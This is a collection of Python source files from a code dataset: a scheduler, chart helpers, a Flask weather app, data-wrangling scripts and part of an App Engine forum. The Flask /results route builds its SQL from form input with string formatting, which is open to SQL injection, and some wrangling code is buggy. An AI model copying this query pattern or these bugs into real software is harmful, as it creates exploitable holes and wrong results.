Line, Style\n\n style = Style(\n width='100%'\n )\n\n attr, v1, v2, v3, v4 = [], [], [], [], []\n line = Line(\"cpu们\", renderer='svg')\n # ** style.init_style\n line.chart_id = 'cpus'\n line.width = '100%'\n line.add(\"cpu1\", attr, v1, is_smooth=\"True\", is_toolbox_show=False)\n line.add(\"cpu2\", attr, v2, is_smooth=\"True\")\n line.add(\"cpu3\", attr, v3, is_smooth=\"True\")\n line.add(\"cpu4\", attr, v4, is_smooth=\"True\")\n return line.render_embed()\n\n\n# Server Status: CPU, Memory, Network\ndef server_status():\n attr = [\"CPU\", \"Memory\", \"Network\"]\n v1 = [0, 0, 0]\n bar = Bar()\n bar.chart_id = \"serverow\"\n bar.width = \"100%\"\n label_color = [\"#a0a7e6\", \"#3fb1e3\", \"#6be6c1\", \"#626c91\", \"#c4ebad\"]\n bar.add(\"Win10\", attr, v1, yaxis_max=100,\n is_stack=True, is_label_show=True,\n bar_category_gap=\"5%\", label_color=label_color)\n return bar.render_embed()\n\n\ndef home_basic(home):\n attr = [\"债务\",\"资产\", \"现金\"]\n v1 = [home.debt, home.asset, home.cash]\n pie = Pie(\"资产概览\")\n pie.id = \"home_basic\"\n pie.width = \"100%\"\n pie.add(\"\",attr,v1,is_label_show=True)\n return pie.render_embed()","sub_path":"app/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407429872","text":"# -*- coding: utf-8 -*-\n\nimport scheduler \nfrom operator import attrgetter\nclass FCFS:\n def __init__(self,inputfile,contextswitching):\n self.readyProcesses = [] #sorted list of all processes in ready state\n self.processes = scheduler.ReadFile(inputfile)\n self.contextSwitching = int(1000*contextswitching)\n self.procNo=[]\n self.startTimes=[]\n self.endTimes=[]\n self.FCFSAlgorithm()\n scheduler.OutputFile(self.processes,self.avgTAT,self.avgWTAT)\n \n \n def GetArrivedProcesses(self,time):\n\n while(self.processes and self.processes[0].arrivalTime <= time):\n self.readyProcesses.append(self.processes[0])\n self.processes.pop(0)\n \n def GetStatsData(self):\n return self.procNo ,self.startTimes,self.endTimes\n \n def FCFSAlgorithm(self):\n currentTime=0\n totalTAT=0\n totalWTAT=0\n executedProcesses= [] #all executed processes\n self.processes.sort() # sorted by arrival time #ID??\n #for i in range (len(self.processes)):\n # print(self.processes[i].arrivalTime)\n #print(len(self.processes))\n running = False # Is there a running process\n while (self.processes or self.readyProcesses or running):\n self.GetArrivedProcesses(currentTime) #check the arrival of new process \n \n if len(self.readyProcesses) == 0 and not running: #no running process or new process arrived\n currentTime+=1\n continue\n \n if not running:\n runningProcess = self.readyProcesses[0]\n running = True\n self.readyProcesses.pop(0) #remove from ready queue\n currentTime += self.contextSwitching #assume there is a full switching time before running fist process\n self.procNo.append(runningProcess.ID)\n self.startTimes.append(currentTime)\n runningProcess.SetTimes(currentTime) #set WT,TAT, WTAT, \n totalTAT+= runningProcess.TAT\n totalWTAT+= runningProcess.WTAT\n \n runningProcess.burstTime -= 1\n currentTime+=1\n if runningProcess.burstTime == 0:\n self.endTimes.append(currentTime) #process finished execusion\n executedProcesses.append(runningProcess)\n running = False\n \n self.processes=executedProcesses\n self.avgTAT= float(totalTAT)/len(self.processes)\n self.avgWTAT= float(totalWTAT)/len(self.processes)\n \n ","sub_path":"fcfs.py","file_name":"fcfs.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228952814","text":"import sys\nimport os\nimport time\nimport requests\nimport psycopg2\nimport calendar\nfrom datetime import datetime\nfrom joblib import Parallel, delayed\nfrom flask import Flask, render_template, request, jsonify\n\ncity_id = requests.get(\"https://www.metaweather.com/api/location/search/?query={}\".format('Moscow')).json()[0]['woeid']\nnum_days = calendar.monthrange(datetime.now().year, datetime.now().month)[1]\ndays = [('{:04}/{:02}/{:02}/'.format(datetime.now().year, datetime.now().month, day)) for day in range(1, num_days + 1)]\ncolumn_names = [\"id\", \"weather_state_name\", \"wind_direction_compass\", \"created\",\n \"applicable_date\", \"min_temp\", \"max_temp\", \"the_temp\"]\n\ndb_params = {\n \"host\": os.getenv('DB_HOST'),\n \"database\": os.getenv('DB_NAME'),\n \"user\": os.getenv('DB_USER'),\n \"password\": os.getenv('DB_PASSWORD'),\n \"port\": \"5432\"\n}\n\ndef get_weather_result(city_id, date):\n url = \"https://www.metaweather.com/api/location/{}/{}\".format(city_id, date)\n weather_result = requests.get(url)\n return weather_result.json()\n\ndef connect(db_params):\n conn = None\n try:\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(**db_params)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1)\n print(\"Connection successful\")\n return conn\n\ndef insert_table():\n try:\n conn = connect(db_params)\n cursor = conn.cursor()\n cursor.execute(\"\"\" CREATE TABLE IF NOT EXISTS forecast (id bigint UNIQUE, weather_state_name varchar(45),\\\n wind_direction_compass varchar(45), created varchar(45), applicable_date varchar(45), min_temp integer,\\\n max_temp integer, the_temp integer); \"\"\")\n for date in days:\n result = get_weather_result(city_id, date)\n for item in result:\n sql = \"\"\" INSERT INTO forecast VALUES (%s,%s,%s,%s,%s,%s,%s,%s) ON CONFLICT (id) DO NOTHING; \"\"\"\n table_data = [item[column] for column in column_names]\n cursor.execute(sql, table_data)\n conn.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into mobile table {}\".format(error))\n cursor.close()\n conn.close()\n\ndef postgresql_query(conn, select_query):\n cursor = conn.cursor()\n try:\n cursor.execute(select_query)\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n cursor.close()\n return 1\n res = cursor.fetchall()\n cursor.close()\n return res\n\ndef worker(i):\n print('worker ', i)\n x = 0\n while x < 1000:\n print(x)\n x += 1\n\ninsert_table()\n\nlist_of_date = [item[0] for item in postgresql_query(conn=connect(db_params),\n select_query=\"\"\"SELECT DISTINCT(applicable_date)\"\n \" FROM forecast ORDER BY applicable_date;\"\"\")]\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html',list_of_date=list_of_date)\n\n@app.route('/results', methods=['POST','GET'])\ndef results():\n select = request.form.get('date_select')\n conn = connect(db_params)\n sql_query = \"\"\" SELECT * FROM forecast WHERE applicable_date = '{}' ORDER BY created; \"\"\".format(select)\n date_weather = postgresql_query(conn, sql_query)\n conn.close()\n return render_template('results.html', select=select, list_of_date=list_of_date, date_weather=date_weather)\n\n@app.route('/update', methods=['POST','GET'])\ndef update():\n insert_table()\n return render_template('update.html', list_of_date=list_of_date)\n\n@app.route('/stress')\ndef stress():\n start_time = time.time()\n Parallel(n_jobs=-1, prefer=\"processes\", verbose=0)(\n delayed(worker)(num)\n for num in range(12000)\n )\n end_time = time.time() - start_time\n resp = jsonify(success=True, time=str(end_time))\n resp.status_code = 200\n return resp\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"627275698","text":"import os\r\nfrom rt import RelationTree\r\n\r\n# ------------------------------------------------------\r\n# ----- creation.py ----\r\n# ------------------------------------------------------\r\n# handle all post-processing duties:\r\n# creates or appends file from dep tree\r\n# ------------------------------------------------------\r\n\r\n\r\nNUM_MAX = 999999\r\nNUM_SIZE = 6\r\nNODE_SIZE = 53\r\nSEEK_NAME = 0\r\nSEEK_ID = 32\r\nSEEK_PID = 38\r\nSEEK_NUM = 44\r\nSEEK_TAG = 50\r\nTAG_SIZE = 3\r\n\r\n# ----------------------\r\n# --- Read from file ---\r\n# ----------------------\r\ndef read_file(fn, pos, size):\r\n with open(fn, 'ab+') as f:\r\n f.seek(pos, 0)\r\n s = str(bytes.decode(f.read(size)))\r\n return s.rstrip(' ')\r\n\r\n# --------------------------\r\n# --- Create/append file ---\r\n# --------------------------\r\ndef create_file(fn, tree):\r\n with open(fn, 'ab+') as f:\r\n f.seek(SEEK_NAME, 1)\r\n f.write(str.encode(str(tree.name)))\r\n f.seek(SEEK_ID, 1)\r\n f.write(str.encode(str(tree.id)))\r\n f.seek(SEEK_PID, 1)\r\n f.write(str.encode(str(tree.parent)))\r\n f.seek(SEEK_NUM, 1)\r\n f.write(str.encode(str(tree.num)))\r\n f.seek(SEEK_TAG, 1)\r\n f.write(str.encode(str(tree.tag)))\r\n f.write(str.encode('\\n'))\r\n\r\n\r\n\r\n# -----------------------------\r\n# --- Overwrite file at pos ---\r\n# -----------------------------\r\ndef write_file(fn, data, pos):\r\n with open(fn, 'r+b') as f:\r\n f.seek(pos, 0)\r\n f.write(str.encode(data))\r\n\r\n# -------------------------\r\n# --- Update root node ---\r\n# -------------------------\r\ndef incrementRoot(fn):\r\n pos = SEEK_NUM\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n if n != NUM_MAX:\r\n write_file(fn, n, pos)\r\n\r\n# --------------------------\r\n# --- Parse tree to file ---\r\n# --------------------------\r\ndef tree_parser(tree, fn):\r\n #with lock:\r\n cwd = os.getcwd()\r\n\r\n path = tree.path\r\n name = tree.name\r\n tag = tree.tag\r\n num = str(tree.num)\r\n id = str(tree.id)\r\n parent = str(tree.parent)\r\n\r\n while len(name) < SEEK_ID: name += ' '\r\n while len(tag) < TAG_SIZE: tag += ' '\r\n while len(str(id)) < NUM_SIZE: id += ' '\r\n while len(str(parent)) < NUM_SIZE: parent += ' '\r\n while len(str(num)) < NUM_SIZE: num += ' '\r\n\r\n tree.set_name(name)\r\n tree.set_id(id)\r\n tree.set_parent(parent)\r\n tree.set_num(num)\r\n tree.set_tag(tag)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n os.chdir(path)\r\n\r\n os.chdir(path)\r\n\r\n if os.path.isfile(fn):\r\n size = os.stat(fn).st_size\r\n infile = False\r\n for i in range(0, size, NODE_SIZE + 1):\r\n res = read_file(fn, i, SEEK_ID)\r\n name = name.rstrip(' ')\r\n p = read_file(fn, i + SEEK_PID, NUM_SIZE)\r\n parent = parent.rstrip(' ')\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 1: Node has same name and parent as\r\n # an existing node in file. Increment node.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n if res == name and p == parent:\r\n incrementNode(fn, i)\r\n infile = True\r\n break\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 2: Node has same name but different\r\n # parent than existing node.\r\n # Check the remainder of the file for a match.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n elif res == name and p != parent:\r\n for j in range(i, size, NODE_SIZE + 1):\r\n res1 = read_file(fn, j, SEEK_ID)\r\n p1 = read_file(fn, j + SEEK_PID, NUM_SIZE)\r\n if res1 == name and p1 == parent:\r\n break\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 3: Node does not exist in file.\r\n # Append node.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n if not infile:\r\n appendNode(fn, tree)\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 4: File does not exist.\r\n # Create file.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n else:\r\n createNode(fn, tree, path)\r\n\r\n os.chdir(cwd)\r\n\r\n\r\n# -----------------------------------\r\n# --- Append the node to the tree ---\r\n# -----------------------------------\r\ndef appendNode(fn, tree):\r\n incrementRoot(fn)\r\n pos = SEEK_PID\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n write_file(fn, n, pos)\r\n if noProblem(fn, tree):\r\n create_file(fn, tree)\r\n\r\n# --------------------------------------\r\n# --- Create root node and first dep ---\r\n# --------------------------------------\r\ndef createNode(fn, tree, path):\r\n rootName = fn[0:len(fn) - 4]\r\n while len(rootName) < SEEK_ID: rootName += ' '\r\n root = RelationTree(rootName, '0 ', '1 ', '1 ', path, ' ')\r\n create_file(fn, root)\r\n create_file(fn, tree)\r\n\r\n# -------------------------------\r\n# --- Increment 'num' in node ---\r\n# -------------------------------\r\ndef incrementNode(fn, i):\r\n incrementRoot(fn)\r\n pos = SEEK_NUM + i\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n write_file(fn, n, pos)\r\n\r\n# ~~~~~~~~~~~ #\r\n# hmm\r\n# ~~~~~~~~~~~ #\r\ndef noProblem(fn, tree):\r\n children = str(int(read_file(fn, SEEK_PID, NUM_SIZE)))\r\n if tree.id != children:\r\n while len(children) < NUM_SIZE: children += ' '\r\n tree.set_id(children)\r\n if tree.id == tree.parent:\r\n parent = \"0\"\r\n while len(parent) < NUM_SIZE: parent += ' '\r\n tree.set_parent(parent)\r\n if tree.name == fn[:-3] or \\\r\n int(tree.id) == NUM_MAX or \\\r\n int(tree.num) == NUM_MAX:\r\n return False\r\n return True\r\n","sub_path":"creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178879091","text":"# imports needed\nimport pandas as pd\nimport numpy as np\nimport os\nfrom env import host, user, password\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef get_connection(db, user=user, host=host, password=password):\n '''\n This function uses my info from my env file to\n create a connection url to access the Codeup db.\n '''\n return f'mysql+pymysql://{user}:{password}@{host}/{db}'\n \n\ndef get_zillow_data():\n '''\n This function uses the SQL query from below and specifies the database to use\n '''\n # SQL query that joins all of the tables together from the 'zillow' database\n # Tweaked to include Ravinder's insights\n sql_query = \"\"\"\n SELECT prop.*, \n pred.logerror, \n pred.transactiondate, \n air.airconditioningdesc, \n arch.architecturalstyledesc, \n build.buildingclassdesc, \n heat.heatingorsystemdesc, \n landuse.propertylandusedesc, \n story.storydesc, \n construct.typeconstructiondesc \n\t\t\t\tFROM properties_2017 prop \n INNER JOIN (SELECT parcelid,\n \t\t\t\t\t logerror,\n Max(transactiondate) transactiondate \n FROM predictions_2017 \n GROUP BY parcelid, logerror) pred\n USING (parcelid) \n LEFT JOIN airconditioningtype air USING (airconditioningtypeid) \n LEFT JOIN architecturalstyletype arch USING (architecturalstyletypeid) \n LEFT JOIN buildingclasstype build USING (buildingclasstypeid) \n LEFT JOIN heatingorsystemtype heat USING (heatingorsystemtypeid) \n LEFT JOIN propertylandusetype landuse USING (propertylandusetypeid) \n LEFT JOIN storytype story USING (storytypeid) \n LEFT JOIN typeconstructiontype construct USING (typeconstructiontypeid) \n WHERE prop.latitude IS NOT NULL \n AND prop.longitude IS NOT NULL;\n \"\"\"\n return pd.read_sql(sql_query,get_connection('zillow'))\n\n\ndef wrangle():\n df = pd.read_csv('zillow.csv')\n \n # Restrict df to only properties that meet single-use criteria\n single_use = [261, 262, 263, 264, 266, 268, 273, 276, 279]\n df = df[df.propertylandusetypeid.isin(single_use)]\n \n # Filter those properties without at least 1 bath & bed and 500 sqft area\n df = df[(df.bedroomcnt > 0) & (df.bathroomcnt > 0) & ((df.unitcnt<=1)|df.unitcnt.isnull())\\\n & (df.calculatedfinishedsquarefeet>500)]\n\n # Drop columns and rows based on a predetermined criteria\n df = handle_missing_values(df)\n \n # Add column for counties\n df['county'] = np.where(df.fips == 6037, 'Los_Angeles',\n np.where(df.fips == 6059, 'Orange', \n 'Ventura'))\n \n # Drop unnecessary/redundant columns\n df = df.drop(['id',\n 'calculatedbathnbr', 'finishedsquarefeet12', 'fullbathcnt', 'heatingorsystemtypeid'\n ,'propertycountylandusecode', 'propertylandusetypeid','propertyzoningdesc', \n 'censustractandblock', 'propertylandusedesc', 'heatingorsystemdesc'],axis=1)\n \n # Replace nulls in unitcnt with 1\n df.unitcnt.fillna(1, inplace = True)\n \n # Replace nulls with median values for select columns\n df.lotsizesquarefeet.fillna(7315, inplace = True)\n df.buildingqualitytypeid.fillna(6.0, inplace = True)\n \n # Drop any remaining nulls\n df = df.dropna()\n \n # Columns that need to be adjusted for outliers\n df = df[df.taxvaluedollarcnt < 4_500_000]\n df[df.calculatedfinishedsquarefeet < 8000]\n \n return df\n\ndef handle_missing_values(df, prop_required_column = .5, prop_required_row = .70):\n\t#Function will drop rows or columns based on the percent of values that are missing\n\t#handle_missing_values(df, prop_required_column, prop_required_row\n threshold = int(round(prop_required_column*len(df.index),0))\n df.dropna(axis=1, thresh=threshold, inplace=True)\n threshold = int(round(prop_required_row*len(df.columns),0))\n df.dropna(axis=0, thresh=threshold, inplace=True)\n return df\n\ndef outlier_function(df, cols, k):\n\t#function to detect and handle oulier using IQR\n for col in df[cols]:\n q1 = df.annual_income.quantile(0.25)\n q3 = df.annual_income.quantile(0.75)\n iqr = q3 - q1\n upper_bound = q3 + k * iqr\n lower_bound = q1 - k * iqr \n df = df[(df[col] < upper_bound) & (df[col] > lower_bound)]\n return df","sub_path":"wrangle_zillow.py","file_name":"wrangle_zillow.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"112432426","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n seen = {}\n ans = []\n for i in range(len(nums)):\n if (target - nums[i]) in seen.keys():\n ans.append(i)\n ans.append(seen[target-nums[i]])\n else:\n seen[nums[i]] = i\n\n return ans\n","sub_path":"1 - Two Sum/python/one-pass-hash/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15967219","text":"names = [\"jiawei\", \"mingxin\", \"zeyu\"]\r\nnames2 = names\r\nstudent = {\"name\" : \"Jiawei\"} #dict\r\na = \"my favorite\"\r\nb = 2\r\ndef test1():\r\n print(\"The original ver: %s\"%names)\r\n names[2] = \"jian\"\r\n student[\"age\"] = \"12\"\r\n print(names)\r\n print(student)\r\n global a\r\n a = \"Cristiano\"\r\n global b\r\n b = b + 1\r\ntest1()\r\nprint(a)\r\nprint(b)\r\n\r\na = [1,2]\r\nprint(id(a))\r\na.insert(1,5) #第一个位置插入5\r\nprint(a)\r\nprint(id(a))\r\na = [4,5]\r\nprint(id(a))\r\n#######################################\r\n#返回多个结果\r\n#用元祖可以,列表也可以\r\ndef test1():\r\n a = 1\r\n b = 2\r\n return [a,b]\r\nx = test1()\r\nprint(x)\r\n\r\ndef test2(x,y,z = 10, d = 1):\r\n return x + y + z\r\nx = test2(1,1)\r\nprint(x)\r\n###################\r\nprint(\"-------------\")\r\ndef test1(x,y,*args, z = 20):\r\n print(args)\r\n sum = 0\r\n for i in args:\r\n sum = sum + i\r\n print(sum)\r\ntest1(1,2,3,4,4,5,6,z = 10)\r\n\r\ndef test2(x, y, *args, **kwargs):\r\n print(x)\r\n print(args)\r\n print(kwargs)\r\n sum = 0\r\n for i in kwargs.values():\r\n sum = sum + i\r\n print(sum)\r\ntest2(2,3,4,5,6,7,8, num1 = 1, num2 = 2)\r\n\r\nnums = [3,4]\r\nnum1 = {\"num1\" : 5, \"num2\" : 6}\r\ndef test3(x, y, *args, **kwargs):\r\n sum = 0\r\n print(x)\r\n print(args)\r\n print(kwargs)\r\ntest3(1,2,3,*nums, **num1 )","sub_path":"9.5Fuction2.py","file_name":"9.5Fuction2.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215582895","text":"# This code is in Public Domain. Take all the code you want, we'll just write more.\n\nimport StringIO, re, string, sha, time, random, cgi, urllib, datetime, pickle, logging\nimport wsgiref.handlers\n\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\n\nfrom django.utils import feedgenerator\nfrom django.template import Context, Template\n\nfrom model import FofouSettings, FofouUser, Forum, Topic, Post\n\nDEBUG = False\n\nHTTP_NOT_ACCEPTABLE = 406\nHTTP_NOT_FOUND = 404\nHTTP_DATE_FMT = \"%a, %d %b %Y %H:%M:%S GMT\"\n\n# Cookie code based on http://code.google.com/p/appengine-utitlies/source/browse/trunk/utilities/session.py\nFOFOU_COOKIE = \"fofou-uid\"\n\n# Valid for 120 days\nCOOKIE_EXPIRE_TIME = 120\n\nSKINS = [\"default\"]\nBANNED_IPS = { }\nRE_VALID_URL = re.compile(r'^[a-z0-9]+([_\\-]?[a-z0-9]+)*$')\n\ndef to_unicode(val):\n if isinstance(val, unicode): \n return val\n try: return unicode(val, 'latin-1')\n except: pass\n try: return unicode(val, 'ascii')\n except: pass\n try: return unicode(val, 'utf-8')\n except: raise\n\ndef to_utf8(s):\n return to_unicode(s).encode(\"utf-8\")\n\nclass FofouBase(webapp.RequestHandler):\n \"\"\" A base class for all request handlers. Abstracts cookies and response writes. \"\"\"\n \n def __init__(self, *args, **kwargs):\n super(FofouBase, self).__init__(*args, **kwargs)\n self.settings = FofouSettings.load()\n \n def template_out(self, template_path, template_values):\n # just a dummy call to to the function\n self.get_cooke()\n self.response.headers['Content-Type'] = 'text/html'\n self.response.out.write( template.render(template_path, template_values) )\n\n def get_cooke(self):\n if self._cookie:\n return self._cookie\n\n try:\n fid = self.request.cookies[FOFOU_COOKIE]\n except KeyError:\n fid = sha.new(repr(time.time())).hexdigest()\n expires = datetime.datetime.now() + datetime.timedelta(COOKIE_EXPIRE_TIME)\n self.response.headers['Set-Cookie'] = '%s=%s; expires=%s; path=/' % (FOFOU_COOKIE, fid, expires.strftime(HTTP_DATE_FMT))\n\n self._cookie = fid\n return self._cookie\n\n cookie = property(get_cooke)\n _cookie = None \n\nclass ManageSettings(FofouBase):\n \n def get(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not is_admin:\n return self.redirect(\"/\")\n \n tvals = {\n 'isadmin': is_admin,\n 'user': user,\n 'settings': self.settings,\n 'logout_url': users.create_logout_url(\"/\")\n }\n return self.template_out(\"skins/default/settings.html\", tvals)\n \n def post(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not is_admin:\n return self.redirect(\"/\")\n \n banned = self.request.get('banned_ips', '').strip()\n email_white = self.request.get('email_whitelist', '').strip()\n email_black = self.request.get('email_blacklist', '').strip()\n\n if self.request.remote_addr in banned:\n banned = banned.replace(self.request.remote_addr, \"\")\n \n self.settings.email_blacklist = email_black\n self.settings.email_whitelist = email_white\n self.settings.banned_ips = banned\n \n self.settings.put()\n \n return self.redirect(self.request.url)\n\nclass ManageForums(FofouBase):\n\n def init(self):\n \"\"\" Initializes the ManageForums views \"\"\"\n \n self.tpl = \"skins/default/forum_list.html\"\n self.forums = db.GqlQuery(\"SELECT * FROM Forum\") \n self.admin = users.is_current_user_admin()\n self.user = users.get_current_user()\n self.forum = None\n self.redir = False\n self.tvals = {\n 'logout_url': users.create_logout_url(\"/\"),\n 'hosturl': self.request.host_url,\n 'isadmin': self.admin,\n 'forums': self.forums,\n 'user': self.user\n }\n forum_key = self.request.get('forum_key')\n if forum_key:\n self.forum = db.get( db.Key( forum_key ) )\n if not self.forum:\n self.redir = True\n\n def get(self):\n \"\"\" Responds to GET requests to the /manageforums URL \"\"\"\n self.init()\n\n if self.redir or not self.admin:\n return self.redirect(\"/\")\n \n # We are disabling/enabling or editing a forum\n forum = self.forum\n if forum:\n forum.tagline = forum.tagline or \"Tagline\"\n forum.title_non_empty = forum.title or \"Title\"\n forum.sidebar_non_empty = forum.sidebar or \"Sidebar\"\n\n if self.request.get('disable') or self.request.get('enable'):\n if self.request.get('disable'):\n forum.is_disabled = True\n elif self.request.get('enable'):\n forum.is_disabled = False\n forum.put()\n return self.redirect(\"/manageforums\")\n \n self.tvals['forum'] = forum\n return self.template_out(self.tpl, self.tvals)\n\n def post(self):\n \"\"\" Responds to POST requests to the /manageforums URL \"\"\"\n self.init()\n \n if self.redir or not self.admin:\n return self.redirect(\"/\")\n \n if not RE_VALID_URL.match( self.request.get('url') ) or \\\n not self.forum and Forum.gql(\"WHERE url = :1\", self.request.get('url') ).get():\n self.tvals.update({\n 'errmsg': \"Url contains illegal characters or is already used by another forum\",\n 'hosturl': self.request.host_url,\n 'forum': { \n 'url': self.request.get('url'), \n 'title': self.request.get('title'), \n 'tagline': self.request.get('tagline'), \n 'sidebar': self.request.get('sidebar'), \n 'analytics_code': self.request.get('analytics_code')\n }\n })\n return self.template_out(self.tpl, self.tvals)\n \n if self.forum:\n forum = self.forum\n forum.url = self.request.get('url')\n forum.title = self.request.get('title')\n forum.tagline = self.request.get('tagline')\n forum.sidebar = self.request.get('sidebar')\n forum.analytics_code = self.request.get('analytics_code')\n else:\n forum = Forum(\n url=self.request.get('url'), \n title=self.request.get('title'), \n tagline=self.request.get('tagline'), \n sidebar=self.request.get('sidebar'), \n analytics_code=self.request.get('analytics_code')\n )\n \n forum.put()\n return self.redirect(\"/manageforums\")\n\nclass DeleteTopic(webapp.RequestHandler):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can delete or undelete posts\n if not forum or not is_admin:\n return self.redirect(\"/\")\n \n try:\n post = db.get( db.Key.from_path( 'Post', int( self.request.get('id') ) ) )\n except ValueError:\n return self.redirect(forum.root())\n\n topic = post.topic\n first = Post.gql(\"WHERE topic=:1 ORDER BY created_on\", topic).get()\n\n if not post or topic.forum.key() != forum.key():\n return self.redirect(forum.root())\n\n if post.is_deleted:\n post.is_deleted = False\n if first.key() == post.key():\n topic.is_deleted = False\n forum.num_topics += 1\n forum.num_posts += topic.ncomments\n else:\n topic.ncomments += 1\n if not topic.is_deleted:\n forum.num_posts += 1\n else:\n post.is_deleted = True\n if first.key() == post.key():\n topic.is_deleted = True\n forum.num_topics -= 1\n forum.num_posts -= topic.ncomments\n else:\n topic.ncomments -= 1\n forum.num_posts -= 1\n \n post.put()\n topic.put()\n forum.put()\n return self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n\nclass LockTopic(webapp.RequestHandler):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can delete or undelete posts\n if not forum or not is_admin:\n return self.redirect(\"/\")\n\n try:\n topic = db.get( db.Key.from_path( 'Topic', int(self.request.get('id')) ) )\n except ValueError:\n return self.redirect( forum.root() )\n\n if topic:\n topic.is_locked = not topic.is_locked\n topic.put()\n\n return self.redirect( forum.root() )\n\nclass ForumList(FofouBase):\n def get(self):\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if is_admin:\n return self.redirect(\"/manageforums\")\n \n if not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n \n if not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n tvals = {\n 'forums': db.GqlQuery(\"SELECT * FROM Forum\"),\n 'isadmin': is_admin,\n 'login_url': users.create_login_url(\"/\"),\n 'logout_url': users.create_logout_url(\"/\"),\n 'user': user\n }\n\n self.template_out(\"skins/default/forum_list.html\", tvals)\n\nclass TopicList(FofouBase):\n \"\"\" Shows a list of topics, potentially starting from topic with an offset \"\"\"\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n user = users.get_current_user()\n is_admin = users.is_current_user_admin()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n\n offset, topics = Topic.getlist(forum, is_admin=is_admin, offset=self.request.get(\"from\") or None)\n for topic in topics:\n topic.excerpt = Post.gql(\"WHERE topic = :1 ORDER BY created_on\", topic)[0].get_excerpt()\n\n tvals = {\n 'user': user,\n 'analytics_code': forum.analytics_code or \"\",\n 'siteurl': self.request.url,\n 'isadmin': is_admin,\n 'forum' : forum,\n 'forum_urls': [f.url for f in Forum.all()],\n 'topics': topics,\n 'offset': offset,\n 'login_url': users.create_login_url(forum.root()),\n 'logout_url': users.create_logout_url(forum.root())\n }\n\n self.template_out(\"skins/default/topic_list.html\", tvals)\n\n# A thread of comments on a topic\nclass Thread(FofouBase):\n\n def get(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n try: \n topic_id = int( self.request.get('id') or 0 )\n except ValueError:\n topic_id = 0\n\n if not topic_id:\n return self.redirect(forum.root())\n\n topic = db.get( db.Key.from_path('Topic', topic_id) )\n \n if not topic or (topic.is_deleted and not is_admin):\n return self.redirect(forum.root())\n \n # TODO: Make Pagination\n if is_admin:\n posts = Post.gql(\"WHERE topic = :1 ORDER BY created_on\", topic)\n else:\n posts = Post.gql(\"WHERE topic = :1 AND is_deleted = False ORDER BY created_on\", topic)\n \n tvals = {\n 'user': user,\n 'analytics_code' : forum.analytics_code or \"\",\n 'isadmin': is_admin,\n 'forum': forum,\n 'topic': topic,\n 'posts': posts,\n 'login_url' : users.create_login_url(self.request.url),\n 'logout_url' : users.create_logout_url(self.request.url)\n }\n 